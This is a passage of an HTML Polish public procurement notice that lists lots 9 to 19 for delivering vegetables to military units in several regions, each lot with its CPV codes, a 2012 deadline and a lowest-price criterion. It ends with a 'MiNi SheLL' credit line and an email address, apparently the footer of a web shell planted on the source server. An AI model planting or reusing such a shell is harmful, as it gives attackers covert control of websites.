Por
Natka pietruszki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.13.10-2, 03.22.14.10-3, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostarczanie warzyw gr I do jednostek wojskowych z rejonu: Gdańsk, Malbork..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr I: 
Buraki ćwikłowe
Marchew
Cebula
Kapusta biała
Kapusta czerwona
Pietruszka korzeniowa
Seler korzeniowy
Por
Natka pietruszki
Koperek zielony
Czosnek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.14.10-3, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostarczanie warzyw gr I do jednostek wojskowych  z rejonu: Bydgoszcz, Mirosławiec..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr I:
Buraki ćwikłowe
Marchew
Cebula
Kapusta biała
Kapusta czerwona
Kapusta pekińska
Pietruszka korzeniowa
Seler korzeniowy
Por
Natka pietruszki
Koperek zielony
Szczypiorek
Czosnek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.14.10-3, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostarczanie warzyw gr I do jednostek wojskowych z rejonu: Toruń..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr I: 
Buraki ćwikłowe
Marchew
Cebula
Papryka słodka
Pomidory
Sałata
Kapusta biała
Kapusta czerwona
Pietruszka korzeniowa
Seler korzeniowy
Por.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.12.30-7, 03.22.12.40-0, 03.22.13.10-2, 03.22.14.10-3, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostarczanie warzyw gr I do jednostek wojskowych z rejonu: Chojnice, Brodnica, Grudziądz, Chełmno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr I: 
Buraki ćwikłowe
Marchew
Cebula
Kapusta biała
Kapusta czerwona
Pietruszka korzeniowa
Seler korzeniowy
Por
Szczypiorek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.14.10-3, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Dostarczanie warzyw gr II do jednostek wojskowych z rejonu: Świnoujście..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr II:
Buraki ćwikłowe
Marchew
Fasola szparagowa
Pomidory
Ogórki
Kapusta biała
Kalafior
Rzodkiewka
Pietruszka korzeniowa
Seler korzeniowy
Por
Natka pietruszki
Koperek zielony
Szczypiorek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.12.12-5, 03.22.12.40-0, 03.22.12.70-9, 03.22.14.10-3, 03.22.14.20-6, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Dostarczanie warzyw gr II do jednostek wojskowych z rejonu: Koszalin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr II:
Marchew
Cebula
Seler korzeniowy
Por.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.12-4, 03.22.11.13-1, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Dostarczanie warzyw gr II do jednostek wojskowych z rejonu: Poznań, Powidz..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr II:
Marchew
Cebula
Pomidory
Ogórki
Kapusta biała
Kalafior
Brokuły
Rzodkiew
Natka pietruszki
Koperek zielony
Szczypiorek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.12-4, 03.22.11.13-1, 03.22.12.40-0, 03.22.12.70-9, 03.22.14.10-3, 03.22.14.20-6, 03.22.14.30-9, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Dostarczanie warzyw gr II do jednostek wojskowych z rejonu: Gdynia, Hel..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr II:
Buraki ćwikłowe
Ogórki
Kapusta biała
Kalafior
Brokuły
Rzodkiewka
Natka pietruszki
Szczypiorek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.12.70-9, 03.22.14.10-3, 03.22.14.20-6, 03.22.14.30-9, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Dostarczanie warzyw gr II do jednostek wojskowych z rejonu: Malbork..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr II:
Buraki ćwikłowe
Kapusta biała
Kalafior
Seler korzeniowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.14.10-3, 03.22.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Dostarczanie warzyw gr II do jednostek wojskowych z rejonu: Inowrocław..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr II:
Buraki ćwikłowe
Marchew
Cebula
Ogórki
Kapusta biała
Kalafior
Rzodkiewka
Pietruszka korzeniowa
Seler korzeniowy
Por
Koperek zielony
Szczypiorek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.12.70-9, 03.22.14.10-3, 03.22.14.20-6, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Dostarczanie warzyw gr II do jednostek wojskowych z rejonu: Toruń..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr II 
Kapusta biała
Kalafior.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.14.10-3, 03.22.14.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com